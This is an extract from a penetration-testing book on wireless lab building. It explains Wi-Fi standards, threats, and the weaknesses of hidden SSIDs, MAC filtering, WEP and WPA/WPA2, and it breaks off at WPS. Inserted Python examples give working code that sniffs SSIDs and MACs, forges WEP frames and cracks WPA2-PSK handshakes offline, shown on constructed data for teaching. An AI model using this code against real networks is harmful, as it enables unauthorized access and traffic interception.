Vyacheslav Fadyushin
Andrey Popov
Vyacheslav Fadyushin is a penetration tester with more than 9 years of professional
experience and a diverse background in various aspects of information security.
His main points of interest and fields of expertise are ethical hacking and penetration
testing, infrastructure and application security, mobile security, and information
security management.
He is also an author of the book, Penetration Testing: Setting Up a Test Lab How-to,
published by Packt Publishing in 2013.
Andrey Popov is a security consultant and penetration tester with rich professional
experience and a diverse background in infrastructure and application security,
information security management, and ethical hacking. He has been working for a
market-leading company along with another security professional since 2007.
Preface
Building a Pentesting Lab for Wireless Networks is a practical guide to building a
penetration testing lab, accessible via Wi-Fi, which contains vulnerable components
and at the same time secured from unauthorized external access. This book is
intended for people learning ethical hacking and for security professionals who are
responsible for penetration testing and maintaining security in their organization
who wish to learn how to build a penetration testing lab for wireless networks.
The fact that the lab is secured from external access allows readers to use it both in
corporate and home networks without putting themselves at risk. Thus, the book
will be useful not only for people new to information security but also for security
professionals who want to shift their expertise to the ethical hacking field. You will
learn how to plan your lab, fill it with components, configure them, and secure the
environment. Additionally, you will get an overview of the most popular hacking
frameworks and toolsets and will be able to prepare your own wireless hacking
platform on a Linux laptop or a virtual machine.
Chapter 4, Designing Application Lab Components, shows you how to fill your lab with
useful components, which are what give the whole lab network its purpose. We
install the most common services that you are likely to meet in the scope of a
commercial penetration testing project and which you will most probably want to be
able to hack.
Chapter 5, Implementing Security, shows our readers how to protect the lab network
from unauthorized access and external attacks by installing and configuring
network- and host-based security solutions. In addition to securing the lab
network, we prepare it for practicing important penetration testing topics, such as
bypassing and evading security mechanisms and assessing their effectiveness.
Chapter 6, Exploring Hacking Toolkits, gives you an overview of several popular
toolkits used in numerous hacking tasks and projects, along with examples of their
utilization in the lab environment. It helps you get a brief understanding of their
capabilities and a foundation for further learning.
Chapter 7, Preparing a Wireless Penetration Testing Platform, shows you how to prepare
a penetration testing platform for wireless hacking, including the basic necessary
tools. Additionally, the chapter explains how to choose a Wi-Fi interface suitable for
penetration testing.
Chapter 8, What's Next?, gives you some hints regarding what to start with and in
which direction to dig if you want to develop ethical hacking skills and become a
professional penetration tester.
Chapter 1: Understanding Wireless Network Security and Risks
In this chapter, we are going to review which wireless technologies allow data
transfer, focusing on the Wi-Fi technology as the most important one for building
our own penetration testing lab. As it is a very important topic for building a
highly secure lab, we will also review the common Wi-Fi security mechanisms
and their security risks in conjunction with an overview of the typical wireless
attack methodology.
In this chapter, we will cover the following topics:
Wireless networks operate in an open medium over which the network owner has
almost no control. Providing a security level equivalent to the physical security
of wired networks is therefore not easy. Wireless network segments can become
reachable from another floor of the same building, from neighboring buildings, or
even from outside; only signal strength limits the physical borders of a wireless
network. Therefore, unlike wired networks, where the connection points are known,
a wireless network can be accessed from anywhere, as long as the signal is strong
enough.
Topology:
Point-to-point
Point-to-multipoint
Use cases:
Corporate infrastructure: office and technological
Providing a service
Personal usage
Range:
Wireless personal area networks (WPAN): Bluetooth, IrDA, and RFID
Wireless local area networks (WLAN): Wi-Fi
Wireless metropolitan area networks (WMAN) and wireless wide area networks (WWAN): WiMAX, GSM, and UMTS
Speed (typical):
1 Mbit/s for WPAN
54 Mbit/s for WLAN
300 Mbit/s for WMAN
15 Mbit/s for WWAN
A compact way of mapping the two most important characteristics of wireless
technologies (data transmission speed and range) is depicted in the following
diagram:
The classification of wireless communications based on range and data transfer speed
As we now have a clear definition, we can proceed to look at some of the types of
wireless data transfer technologies and their specifics.
Let's start with mobile cellular communication, which is probably the most
common type of wireless data transmission nowadays. Cellular communication is a
type of mobile communication based on a cellular network. Its key feature is that
the overall coverage area is divided into cells. Cells partially overlap and together
form a network. The network comprises separate base stations operating in the same
frequency band, each covering its own area (cell) with a radio signal, plus switching
equipment. Cells have unique IDs that allow the network to determine the current
location of a subscriber and to keep a connection alive when a person moves from
the coverage area of one base station into the range of another.
The history of mobile communications began in the middle of the 20th century and
has passed four major milestones in its development between then and the present time:
Currently, the most forward-looking solutions are UMTS and LTE. Both data
transmission standards evolved from the GSM family and allow us to transmit
voice or data and provide a set of various services. The distinctive feature of these
standards compared with the older generations is the ability to transfer data at a
higher speed (up to 21 Mbit/s downlink in the case of UMTS and up to 300 Mbit/s
downlink in the case of LTE). These speeds make working on the Internet comfortable.
Since there are a large number of existing standards and many differences between
national regulations, different transmission frequencies and different information
protection techniques (based on different encryption algorithms) may be used in
different countries and industries.
The next wireless technology that we are going to review is Bluetooth (a representative
of WPAN). Bluetooth allows information exchange between personal devices such as
mobile phones, personal computers, tablets, input devices (microphones, keyboards,
and joysticks), and output devices (printers and headsets). Bluetooth operates in
the license-free and widely available 2.4 to 2.485 GHz radio band for short-range
communication, typically at a distance of up to 10 meters (but there are exceptions)
between devices, and supports two types of connection: point-to-point and
point-to-multipoint.
Bluetooth has a multilevel architecture consisting of the main protocol and a set of
auxiliary protocols that implement the following:
Creating a virtual serial data stream and emulating RS-232 control signals
TCP/IP
This technology (IrDA, infrared communication) became especially popular in the late
1990s. Nowadays, it has been almost entirely replaced by more modern methods of
communication such as Wi-Fi and Bluetooth. But it is still used in remote controls
for home appliances, and usually these devices have a one-way connection (one side
has an emitter only and the other side has a receiver only).
The main reasons for the rejection of IrDA were the following:
Low speed of data transmission (in the later revisions of the standard, speed
was increased but even the high-speed versions are not popular now)
Another example of wireless optics as data transmission is Free Space Optics (FSO).
This exotic technology uses an infrared laser as the information carrier, and it is used
for long-distance communications in open spaces. The disadvantage of this system,
as in the case of IrDA, is the direct visibility requirement that is highly dependent
on weather.
Usually, FSO is used:
When you require a private link that is not susceptible to radio interference
and does not create any (for example, at airports)
Going back to wireless data transmission using a radio signal, we need to review the
IEEE 802.11 standards family, also known as Wi-Fi (Wi-Fi is a trademark of Wi-Fi
Alliance for wireless networks based on IEEE 802.11 standards family).
The family of IEEE 802.11 contains a few dozen standards, but we will directly take a
look at the ones designed for data transmission, omitting the auxiliary ones:
802.11a: This is the standard approved in 1999 and used since 2001. This
standard allows us to work at 5 GHz frequency with 54 Mbit/s speed.
802.11g: This allows us to transfer data at 2.4 GHz frequency with 54 Mbit/s
speed. It was approved in 2003.
802.11n: This was approved in 2009. This standard increases the speed of
data transmission up to 600 Mbit/s in the 2.4 GHz or 5 GHz band.
The standard is backwards-compatible with 802.11 a/b/g.
802.11ac and 802.11ad: These standards were published in December 2012 (802.11ad)
and December 2013 (802.11ac). They allow data transfer at speeds of up to about
7 Gbit/s; 802.11ac stays in the 5 GHz band, while 802.11ad adds a new working
frequency (60 GHz).
IEEE 802.11 is used for data transmission via radio within a range of typically up to
about 100 meters. Typically, an IEEE 802.11 network consists of at least one access
point and at least one client, but it is also possible to connect two clients in
point-to-point (ad hoc) mode. In the case of a point-to-point connection, no access
point is used and the clients are connected directly to each other.
Due to the fact that IEEE 802.11 applies to WLAN and provides high-speed data
transfer for a local area, solutions based on IEEE 802.11 are ideal to solve "the last
mile" problem. IEEE 802.11 allows us to reduce costs of deploying and expanding
local networks and also provides network access in difficult-to-reach places, such as
outdoors or inside buildings that have historical value.
The second threat is misconfiguration of network devices, such as using weak
encryption keys or authentication methods with known vulnerabilities. These are the
weaknesses potential attackers exploit first. An incorrectly configured access point
can become the way into an entire corporate network. In addition, in a corporate
network it is difficult to detect the use of unauthorized (rogue) access points; for
example, an ordinary employee can bring an unregistered access point and connect it
to the corporate network. This creates a serious threat not only to the wireless
network but to the entire company's infrastructure.
Incorrectly configured wireless clients are an even greater threat than incorrectly
configured access points. Such devices move between networks, and often they are
left with default settings or are not specifically configured to reduce the risk.
Following on from the previous point, the next threat is breaking the encryption.
Attackers are well aware of the flaws in widely used encryption schemes; in the case
of the WEP protocol, for example, they can recover the shared key from captured
client traffic in less than 10 minutes.
The fourth threat facing wireless networks is the difficulty of tracking a user's
actions. As already noted, wireless devices are not "tied" to the network and can
change their point of connection. An incorrectly configured wireless client may
automatically connect to the nearest wireless network with a known name. This lets
an attacker lure the unsuspecting user's host onto an attacker-controlled (rogue)
access point instead of the legitimate one and perform vulnerability scanning,
phishing, or man-in-the-middle attacks. Furthermore, if the user is simultaneously
connected to a wired network, the host becomes a convenient entry point into the
corporate network.
Impersonating a user is a serious threat to any network, not just wireless ones.
However, in wireless communication, establishing the authenticity of a user is more
difficult. Network identifiers (SSIDs) and MAC address filtering exist, but both
SSIDs and MAC addresses are transmitted in clear text in management frames and can
be intercepted. Impersonation allows attackers to inject forged frames into
authorized communications and carry out attacks on the corporate infrastructure.
The fact that many laptop users prefer switching to WLANs if they are dissatisfied
with the quality of the wired network service (weak connection, URL-filtering, or
port-filtering) increases the risk. In most cases, operating systems do it automatically
when a wired network is down.
[7]
The last threat that we would like to mention is Denial of Service (DoS). The aim
of a typical DoS attack is to disrupt the availability of a network service or to
block authorized clients completely. Such an attack can be carried out, for example,
by flooding a network with deauthentication or "junk" frames sent from a spoofed
address. Tracking the source of such an attack is not an easy task. In addition, a
DoS attack can be mounted at the physical layer by running a fairly powerful jammer
in the relevant frequency band.
The standard also introduces error correction and the ability to work under strong
interference and with a weak signal. For this purpose, it describes automatic rate
adaptation based on the current signal strength and interference. The spread of Wi-Fi
has drastically increased the number of wireless devices in the world and created the
problem of interference and congestion in the 2.4 GHz band, because devices such as
microwave ovens, cordless phones, and Bluetooth equipment noticeably interfere with
Wi-Fi and with each other.
The 802.11a standard (operating in the 5 GHz band) was developed to relieve the
2.4 GHz band. There are fewer sources of interference in the new band compared with
the 2.4 GHz band, and the average noise level is much lower. 802.11a uses two
sub-bands around 5 GHz and provides a maximum data transfer rate of up to 54 Mbit/s.
It should be mentioned that the 5 GHz band is adjacent to, and partly shared with,
frequencies used by radar, satellite, and other licensed systems. To avoid
interference between Wi-Fi equipment and those systems, the European
Telecommunications Standards Institute (ETSI) requires two additional mechanisms,
standardized in IEEE 802.11h: Dynamic Frequency Selection (DFS) and Transmit Power
Control (TPC). Using them, Wi-Fi devices automatically change channel or decrease
transmission power when a conflict is detected on the carrier frequency.
The next step in the development of Wi-Fi is the standard 802.11g, approved in 2003.
802.11g is an improved version of 802.11b and is designed for devices operating at
frequencies of 2.4 GHz with a maximum speed of 54 Mbit/s.
Now, the 802.11n standard has become the most widely used Wi-Fi technology. Its
developers attempted to combine all the good features of the previous versions in
this new one. 802.11n is designed for equipment operating in the 2.4 GHz and 5 GHz
bands at speeds of up to 600 Mbit/s. The standard was approved by the IEEE in
September 2009 and is based on MIMO-OFDM. Its maximum data rate is several times
greater than that of the previous standards. This is achieved by doubling the channel
width from 20 MHz to 40 MHz and by MIMO, which uses multiple antennas to transmit
several spatial streams at once.
The newest standard, which is rapidly gaining popularity, is 802.11ac, approved in
December 2013. It operates in the 5 GHz band and is backward compatible with
IEEE 802.11n.
This standard significantly expands the available bandwidth, from 433 Mbit/s with a
single spatial stream to 6.77 Gbit/s with eight MU-MIMO spatial streams. This is the
most significant innovation with respect to IEEE 802.11n. In addition, it uses
significantly less energy per transferred byte, which extends the battery life of
mobile devices.
| Standard | Frequencies, MHz | Channels | Speeds, Mbit/s | Power, mW |
| 802.11 | 2400-2483.5 | 20 | 1; 2 | 100 |
| 802.11b | 2400-2483.5 | 13 | 1; 2; 5.5; 11; 22 | 100 |
| 802.11a | 5150-5350 / 5650-6425 | 20 | 6; 9; 12; 18; 24; 36; 48; 54; 108 | 100 / 1000 |
| 802.11g | 2400-2483.5 | 13 | 1; 2; 5.5; 6; 9; 11; 12; 18; 22; 24; 33; 36; 48; 54; 108 | 250 |
| 802.11n | 2400-2483.5 / 5150-5350 / 5650-6425 | | 150 (per spatial stream) | 100 / 250 / 1000 |
| 802.11ac | 5170-5905 | | 433 (per spatial stream) | 500 |
Where a standard uses several frequency sub-bands, the power limits are listed in the same order as the sub-bands.
Hiding SSID
Let's start with one of the common mistakes made by network administrators: relying
only on security by obscurity. In the context of this topic, it means using a hidden
WLAN SSID (short for service set identifier), which is simply the WLAN name.
A hidden SSID means that an access point does not include its SSID in the broadcast
beacons advertising the WLAN and does not respond to broadcast probe requests, so the
WLAN does not appear in the list of available networks on Wi-Fi-enabled devices. It
also means that normal users do not see the WLAN in their available networks list.
But the lack of WLAN advertising does not mean that the SSID is never transmitted
over the air: it is actually transmitted in plaintext in many management frames
exchanged between access points and the devices connecting to them (probe requests,
probe responses, and association requests), regardless of the security type used.
Therefore, SSIDs are always available to any Wi-Fi network interface in range and are
visible to any attacker using passive sniffing tools.
MAC filtering
To be honest, MAC filtering cannot even be considered as a security or protection
mechanism for a wireless network, but it is still called so in various sources. So let's
clarify why we cannot call it a security feature.
Basically, MAC filtering means allowing only those devices that have MAC
addresses from a pre-defined list to connect to a WLAN, and not allowing
connections from other devices. MAC addresses are transmitted unencrypted in
Wi-Fi and are extremely easy for an attacker to intercept without even being noticed
(refer to the following screenshot):
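The following example is added here and is not code from the book: it parses a few constructed 802.11 management frames the way a passive sniffer would, flags the beacon whose SSID element is empty (the "hidden" network), recovers the SSID from the client's directed probe request, the probe response, and the association request, and lists the client MAC addresses that a MAC filter on that access point trusts. The frame layout follows the 802.11 management frame format; the MAC addresses, the SSID "LabNet", and the frames themselves are constructed for the example.

```python
import struct

# 802.11 management subtypes (Frame Control bits 4-7) handled here, and the
# size of the fixed fields that precede the tagged parameters in each body.
MGMT_SUBTYPES = {0x0: "association request", 0x4: "probe request",
                 0x5: "probe response", 0x8: "beacon"}
FIXED_LEN = {0x0: 4, 0x4: 0, 0x5: 12, 0x8: 12}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, da, sa, bssid, ssid, fixed=b""):
    """Minimal management frame: 24-byte header, fixed fields, then the
    SSID (element ID 0) and Supported Rates (element ID 1) elements."""
    fc = subtype << 4                      # type 0 = management, no flags
    header = struct.pack("<HH6s6s6sH", fc, 0, da, sa, bssid, 0)
    ssid_tag = bytes([0, len(ssid)]) + ssid
    rates_tag = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])
    return header + fixed + ssid_tag + rates_tag


def parse_mgmt(frame):
    """Addresses and SSID of a management frame, or None for other frames."""
    if len(frame) < 24:
        return None
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    if (fc >> 2) & 0x3 != 0:               # not a management frame
        return None
    subtype = (fc >> 4) & 0xF
    if subtype not in MGMT_SUBTYPES:
        return None
    body = frame[24 + FIXED_LEN[subtype]:]
    tags, i = {}, 0
    while i + 2 <= len(body):              # walk the tagged parameters
        tag_id, tag_len = body[i], body[i + 1]
        tags[tag_id] = body[i + 2:i + 2 + tag_len]
        i += 2 + tag_len
    ssid = tags.get(0, b"")
    # A hidden network sends an empty SSID element (or one filled with NULs).
    hidden = ssid.strip(b"\x00") == b""
    return {"subtype": MGMT_SUBTYPES[subtype], "da": mac_str(a1),
            "sa": mac_str(a2), "bssid": mac_str(a3),
            "ssid": ssid.decode("utf-8", "replace"), "hidden": hidden}


def leaked_ssids(frames):
    """Map every SSID seen in plaintext to the BSSIDs it was seen with."""
    seen = {}
    for p in map(parse_mgmt, frames):
        if p and not p["hidden"]:
            seen.setdefault(p["ssid"], set()).add(p["bssid"])
    return seen


def trusted_client_macs(frames, bssid):
    """Source MACs of stations associating with the AP: exactly the
    addresses a MAC filter on that AP allows, and what an attacker spoofs."""
    return {p["sa"] for p in map(parse_mgmt, frames)
            if p and p["subtype"] == "association request" and p["bssid"] == bssid}


# Constructed sample traffic (not a real capture).
AP = bytes.fromhex("02aabbccdd01")
STA = bytes.fromhex("02aabbccdd02")
BCAST = b"\xff" * 6
SAMPLE_FRAMES = [
    build_mgmt(0x8, BCAST, AP, AP, b"", fixed=bytes(12)),      # beacon, hidden SSID
    build_mgmt(0x4, BCAST, STA, BCAST, b"LabNet"),             # directed probe request
    build_mgmt(0x5, STA, AP, AP, b"LabNet", fixed=bytes(12)),  # probe response
    build_mgmt(0x0, AP, STA, AP, b"LabNet", fixed=bytes(4)),   # association request
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_mgmt(f))
    print("SSIDs leaked over the air:", leaked_ssids(SAMPLE_FRAMES))
    print("Client MACs the filter trusts:", trusted_client_macs(SAMPLE_FRAMES, mac_str(AP)))
```

Everything this code reads is in the unencrypted frame header and tagged parameters, which is why neither hiding the SSID nor filtering MAC addresses costs an attacker anything beyond a monitor-mode interface.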
WEP
Wired equivalent privacy (WEP) was born almost 20 years ago at the same time
as the Wi-Fi technology and was integrated as a security mechanism for the IEEE
802.11 standard.
As often happens with new technologies, it soon became clear that WEP contained
weaknesses in design and was unable to provide reliable security for wireless
networks. Several attack techniques were developed by security researchers that
allowed them to crack a WEP key in a reasonable amount of time and use it to
connect to a WLAN or intercept network communications between WLAN and
client devices.
Let's briefly review how WEP encryption works and why it is so easy to break.
WEP seeds the RC4 stream cipher with a so-called initialization vector (IV)
concatenated with the WLAN's shared key, and XORs the resulting keystream with the
packet and its CRC-32 checksum (the integrity check value). The IV is then prepended
to the encrypted packet in plaintext and sent to the receiving side, for example, an
access point. This process is depicted in the following flowchart:
Flowchart: WEP encryption. Wi-Fi device: generate IV; RC4 keystream from IV || key; CRC over the clear text; (clear text || CRC) XOR keystream = cipher text; wireless transfer of IV || cipher text. Access point: RC4 keystream from the received IV || key; cipher text XOR keystream = clear text || CRC.
The IV is only 24 bits long and travels in plaintext, so keystreams repeat after a
few million packets, and statistical attacks on RC4's key schedule recover the key
from a large enough set of captured IVs. An attacker therefore just needs to collect
enough IVs, which is also a trivial task using additional replay attacks to force
victims to generate more of them.
Even worse, there are attack techniques that allow an attacker to penetrate
WEP-protected WLANs even without connected clients, which makes those WLANs
vulnerable by default.
Additionally, WEP has no cryptographic integrity protection: the CRC-32 it uses is
linear, so an attacker can flip bits in an intercepted frame and fix up the checksum
without knowing the key, which also makes it vulnerable to attacks on confidentiality.
There are numerous ways an attacker can abuse a WEP-protected WLAN,
for example:
Decrypt network traffic using active attacks (a replay attack, for example)
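The following example is added here and is not code from the book. It implements the WEP frame encryption shown in the flowchart (RC4 seeded with IV || key, CRC-32 as the ICV) and then demonstrates the two weaknesses just described: a bit-flipping attack that rewrites the plaintext of an intercepted frame and patches the ICV using the linearity of CRC-32, and recovery of a second frame's plaintext when the same IV, and hence the same keystream, is reused. The 40-bit key, IV, and HTTP-like payloads are constructed for the example.

```python
import struct
import zlib


def rc4(key, length):
    """RC4 keystream of the requested length (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data):
    """WEP's ICV: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """Frame body = IV (3 bytes, in clear) || RC4(IV||key) xor (data || ICV)."""
    payload = plaintext + crc32_le(plaintext)
    return iv + xor(payload, rc4(iv + key, len(payload)))


def wep_decrypt(key, frame):
    """Return (data, icv_ok) for a frame body produced by wep_encrypt."""
    iv, body = frame[:3], frame[3:]
    payload = xor(body, rc4(iv + key, len(body)))
    data, icv = payload[:-4], payload[-4:]
    return data, icv == crc32_le(data)


def flip_bits(frame, delta):
    """Turn plaintext P into P xor delta without the key. RC4 is a stream
    cipher, so XORing the ciphertext XORs the plaintext; CRC-32 is affine,
    so crc(P xor delta) = crc(P) xor crc(delta) xor crc(zeros)."""
    icv_delta = xor(crc32_le(delta), crc32_le(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], delta + icv_delta)


def keystream_reuse_recover(known_frame, known_plain, target_frame):
    """Two frames under the same IV share a keystream: C1 xor C2 = P1 xor P2,
    so one known plaintext reveals the other (up to the known length)."""
    n = min(len(known_plain), len(target_frame) - 7)   # 3 IV + 4 ICV bytes
    return xor(xor(known_frame[3:3 + n], target_frame[3:3 + n]), known_plain[:n])


# Constructed demonstration values (not from a real network).
KEY = bytes.fromhex("0102030405")   # 40-bit WEP key
IV = bytes.fromhex("000001")


def demo():
    original = b"GET /index.html HTTP/1.0"
    frame = wep_encrypt(KEY, IV, original)
    # In-flight change of "index" to "admin"; the receiver's ICV check still passes.
    delta = bytearray(len(original))
    delta[5:10] = xor(b"index", b"admin")
    forged = flip_bits(frame, bytes(delta))
    # The same IV reused for a second frame: known plaintext exposes the other.
    secret = b"POST /login user=pentester"
    known = b"X" * len(secret)
    f_known = wep_encrypt(KEY, IV, known)
    f_secret = wep_encrypt(KEY, IV, secret)
    return {"roundtrip": wep_decrypt(KEY, frame),
            "forged": wep_decrypt(KEY, forged),
            "recovered": keystream_reuse_recover(f_known, known, f_secret)}


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Both attacks work on a single intercepted frame or pair of frames and never touch the key; key recovery (the statistical attacks on the IVs) is a separate, third weakness.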
Although WEP was officially superseded by the WPA technology in 2003, it can still
be sometimes found in private home networks and even in some corporate networks
(mostly belonging to small companies nowadays).
But this security technology has become very rare and will not be used in future,
largely due to awareness in corporate networks and because manufacturers no
longer activate WEP by default on new devices.
In our humble opinion, device manufacturers should not include WEP support in
their new devices to avoid its usage and increase their customers' security.
From the security specialist's point of view, WEP should never
be used to protect a WLAN, but it can be used for Wi-Fi security
training purposes.
Regardless of the security type in use, shared keys always add
an additional security risk; users often tend to share keys, thus
increasing the risk of compromising the key and reducing
accountability for key privacy.
Moreover, the more devices use the same key, the greater
the amount of traffic becomes suitable for an attacker during
cryptanalytic attacks, increasing their performance and chances of
success. This risk can be minimized by using personal identifiers
(key, certificate) for users and devices.
WPA/WPA2
Due to numerous WEP security flaws, the next generation of Wi-Fi security
mechanisms became available in 2003: Wi-Fi Protected Access (WPA). It was
announced as an intermediate solution until WPA2 became available and
contained significant security improvements over WEP.
Those improvements include:
Stronger encryption: The new standards use longer keys than WEP (a 256-bit
pairwise master key versus WEP's 64- and 128-bit keys) and became capable of
using the Advanced Encryption Standard (AES) algorithm.
The support for the cryptographically strong AES algorithm was implemented in
WPA, but it was not set as mandatory, only optional.
Although WPA was a significant improvement over WEP, it was a temporary
solution before WPA2 was released in 2004 and became mandatory for all new
Wi-Fi devices.
WPA2 works very similarly to WPA and the main differences between WPA and
WPA2 are in the algorithms used to provide security:
AES became the mandatory encryption algorithm in WPA2, replacing the RC4
default of WPA
TKIP, used in WPA, was replaced by Counter Mode with CBC-MAC Protocol (CCMP)
Because of their very similar workflows, WPA and WPA2 are vulnerable to similar or
identical attacks and are usually referred to together as WPA/WPA2. Both WPA and
WPA2 can work in two modes: pre-shared key (PSK), also called personal mode, and
enterprise mode.
Diagram: WPA/WPA2-PSK 4-way handshake. The passphrase (PSK) is distributed to the access point and the client out of band; each side derives the PMK from the PSK and the SSID. Message 1 (access point to client): A-nonce. Message 2 (client to access point): S-nonce and Message Integrity Code (MIC); the client has derived the PTK. Message 3 (access point to client): install key, MIC; the access point has derived the PTK and checked the MIC. Message 4 (client to access point): key installed, MIC. Both sides check the MIC, install the key, and begin encryption.
The main WPA/WPA2 flaw in PSK mode is the possibility to sniff a whole 4-way
handshake and to brute force a security key offline without any interaction with a
target WLAN. Generally, the security of a WLAN mostly depends on the complexity
of the chosen PSK.
Computing a PMK (short for pairwise master key), which is used in the 4-way
handshake (refer to the handshake diagram), is a very time-consuming operation
compared to other computations (it takes 4,096 iterations of PBKDF2), and computing
hundreds of thousands of them takes a very long time. But when a short, low-complexity
PSK is in use, a brute-force attack does not take long even on a not-so-powerful
computer. If the key is complex and long enough, cracking it can take much longer,
but there are still ways to speed up the process:
Using powerful computers with CUDA (short for Compute Unified Device
Architecture), which allows a software to directly communicate with GPUs
for computing. As GPUs are natively designed to perform mathematical
operations and do them much faster than CPUs, the process of cracking
works several times faster with CUDA.
Using rainbow tables that contain pairs of candidate PSKs and their
corresponding precomputed PMKs. They save a lot of time for an attacker,
because the cracking software only has to test the precomputed PMKs against
an intercepted 4-way handshake and return the matching key, instead of
computing a PMK for every possible character combination. Because the WLAN
SSID is used as a salt when the PMK is derived from the PSK, PMKs for the
same key differ for different SSIDs. This limits the application of rainbow
tables to a number of the most popular SSIDs.
Using cloud computing is another way to speed up the cracking process, but
it usually costs additional money. The more computing power an attacker
can rent (or get through another ways), the faster the process is. There are
also online cloud-cracking services available on the Internet for various
cracking purposes including cracking 4-way handshakes.
Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater the
risk of compromise; that is why it is also not an option for big, complex corporate
networks.
WPA/WPA2 PSK mode provides the sufficient level of security for home
and small office networks only when a key is long and complex enough
and is used with a unique (or at least not popular) WLAN SSID.
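The following example is added here and is not code from the book: it carries the PSK-mode attack through in code. It derives the PMK from a passphrase and SSID exactly as WPA/WPA2 does (PBKDF2-HMAC-SHA1, 4,096 iterations), expands it into the PTK with the PRF from IEEE 802.11i, computes the MIC of handshake message 2 with the KCK, and then runs an offline dictionary attack against a captured handshake by repeating that derivation for each candidate. The "captured" handshake is built in the same script from a constructed passphrase, MAC addresses, and nonces; the MIC calculation assumes WPA2 (key descriptor version 2, HMAC-SHA1-128), which is what a WPA2-CCMP network uses.

```python
import hashlib
import hmac
import struct


def pmk_from_psk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so one passphrase gives a different PMK per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-512 from IEEE 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]          # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


MIC_OFFSET = 81   # Key MIC field: 4-byte 802.1X header + 77 bytes of EAPOL-Key fields


def eapol_mic(kck, eapol):
    """WPA2 (descriptor version 2): HMAC-SHA1-128 over the EAPOL-Key frame with
    the MIC field zeroed. WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce, mic=bytes(16)):
    """Constructed EAPOL-Key message 2 (client -> AP): descriptor type 2,
    key info 0x010a (pairwise, MIC bit, version 2), replay counter 1, no key data."""
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, 0x010A, 0, 1, snonce,
                       bytes(16), bytes(8), bytes(8), mic, 0)
    return struct.pack(">BBH", 1, 3, len(body)) + body


def crack_psk(capture, wordlist):
    """Offline attack: PMK -> PTK -> KCK per candidate, compare the MIC of
    message 2. No interaction with the target WLAN is needed."""
    ssid, aa, spa, anonce, snonce, eapol = (
        capture[k] for k in ("ssid", "aa", "spa", "anonce", "snonce", "eapol"))
    observed = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_psk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), observed):
            return candidate
    return None


def make_capture(ssid, passphrase, aa, spa, anonce, snonce):
    """Constructed 'sniffed' handshake: a real capture hands the attacker
    exactly these fields (SSID, both MACs, both nonces, message 2 with MIC)."""
    kck = ptk_from_pmk(pmk_from_psk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol = build_message2(snonce, eapol_mic(kck, build_message2(snonce)))
    return {"ssid": ssid, "aa": aa, "spa": spa,
            "anonce": anonce, "snonce": snonce, "eapol": eapol}


# Constructed values: SSID, passphrase, MACs, nonces and wordlist are invented.
CAPTURE = make_capture("LabNet", "WirelessLab!",
                       bytes.fromhex("02aabbccdd01"), bytes.fromhex("02aabbccdd02"),
                       bytes(range(32)), bytes(range(32, 64)))
WORDLIST = ["password", "12345678", "letmein1", "WirelessLab!", "WirelessLab?"]

if __name__ == "__main__":
    print("IEEE 802.11i test vector:", pmk_from_psk("password", "IEEE").hex())
    print("cracked PSK:", crack_psk(CAPTURE, WORDLIST))
```

The cost of the attack is one PBKDF2 computation per candidate, which is what GPU cracking and precomputed PMK tables attack; because the SSID is the PBKDF2 salt, a table for "LabNet" is useless against a network named anything else.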
Enterprise mode
As already mentioned in the previous section, using shared keys poses a security
risk, and in the case of WPA/WPA2-PSK the security level relies heavily on the key's
length and complexity. But there are several additional factors in enterprise networks
that should be taken into account when talking about WLAN infrastructure:
flexibility, manageability, and accountability.
There are various components that implement those functions in big networks, but
in the context of our topic, we are mostly interested in two of them: AAA (short for
authentication, authorization, and accounting) servers and wireless controllers.
WPA-Enterprise, or 802.1X mode, was designed for enterprise networks where a high
security level is needed; it requires an AAA server. In most cases, a RADIUS server
is used as the AAA server, and the following EAP (Extensible Authentication
Protocol) types are supported with WPA/WPA2 to perform authentication (and several
more, depending on the wireless device):
EAP-TLS
EAP-TTLS/MSCHAPv2
PEAPv0/EAP-MSCHAPv2
PEAPv1/EAP-GTC
PEAP-TLS
EAP-FAST
Diagram: WPA-Enterprise authentication. The client initiates a connection to the access point; the access point sends an identity request over 802.1X; the client's identity response is forwarded to the RADIUS server (RADIUS protocol over the cabled network); after the EAP exchange, the RADIUS server returns the authentication result, and the access point either authorizes the port or disconnects the client.
WPS
Wi-Fi Protected Setup (WPS) is actually not a security mechanism, but a key
